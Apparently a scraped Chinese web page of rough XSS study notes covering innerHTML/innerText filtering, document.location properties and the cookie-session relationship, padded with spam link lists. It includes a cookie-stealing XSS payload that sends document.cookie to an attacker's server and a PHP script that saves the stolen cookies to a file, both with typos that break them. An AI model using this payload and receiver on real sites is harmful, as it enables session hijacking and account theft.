当前位置: 首页 > news >正文

网站建设制作ppt手机app开发制作推荐

网站建设制作ppt,手机app开发制作推荐,做软件营销网站怎么样,网站搭建的策略与方法(乱写的一些笔记) innerHTML只防script像是img就不会防 innerText都防 上面代码执行避免用户交互 js也可以用’‘执行 例子 alert’1‘ document.location.hash // #号后的部分,包括#号 document.location.host // 域名…

(乱写的一些笔记)

innerHTML只防script像是img就不会防

innerText都防

上面代码执行避免用户交互

 js也可以用’‘执行

例子 alert’1‘

document.location.hash          // #号后的部分,包括#号
document.location.host          // 域名+端口号
document.location.hostname      // 域名
document.location.href          // 完整URL
document.location.pathname      // 目录部分
document.location.port          // 端口号
document.location.protocol      // 网络协议(http:)
document.location.search        // ?号后的部分

document.location.hash.slice(1)//获取#号后的部分,不包括#号

cookie和session关系  session就是cookie,在你注册一个用户,服务器生成一个session文件,session文件名为一个随机字符串,文件里面存储一些你的信息。服务端会将你的文件名返回给你的客户端,保存在你客户端的cookie,当你二次登陆时浏览器会带着你的cookie进入到服务端,服务器就会在自己的文件中找有没有你cookie名字的文件

xss payload 构造<script>doument.location.href=“自己服务器地址/cookie.php?cookie=”+doument.cookie</script>

接收cookie的脚本cookie.php

<?php

$cookie=$_GET['cookie'];

//将coolie变量传入file.txt中

file_put_contents('file.txt',$cookkie)

?>

http://www.yayakq.cn/news/292104/

相关文章:

  • 网站建设第二年费用上海网站建设微信开发
  • 用shopify 做网站鞍山做网站排名
  • 网站地图怎样做网站换行代码
  • 学习建站的网站淘宝友情链接怎么设置
  • 阿里云网站建设教程2017seo优化首页
  • 公司网站建设内容建议免费建站网站排名
  • 企业建设网站个人总结海南专业网站开发公司
  • 大型wordpress theme双桥seo排名优化培训
  • 建设网站的虚拟主机在哪里买wp做购物网站
  • 网站底部设计硬件开发需求
  • 黄冈网站推广优化技巧网站建设价格明细表和网站预算
  • 建设网站市场规模公司网页制作选择软件
  • 郑州网站建设公司seo排名优化工具
  • wordpress 表格程序苏州百度 seo
  • 建设兼职网站目的wordpress外观小工具
  • 网站建设业务员在哪里接单管理系统网站开发
  • 信息流广告剪辑求职seo服务
  • 一个人做网站要多久seo优化的基本流程
  • app开发科技网站建设厦门自主建站模板
  • 哈尔滨建设网站的免费咨询番禺区住房和建设局物业网站
  • 网站虚拟主机查询wordpress主题首页文件
  • 正规的网站建设学习网网站建设培训班价格
  • 163建筑网站深圳网站seo关键词
  • 做爰xo的视频网站试看如何快速做企业网站包括商城
  • 上海建设门户网站深圳福田有什么好玩的地方
  • 网站正在建设中html网站建设faq系统指什么
  • 国外可以用什么网站做问卷长春软件公司排名
  • 网站建设费摊销年限做网站用微软雅黑
  • wordpress全站使用cdn做词频分析的网站
  • 江西省美丽乡村建设公布网站wordpress淘宝ued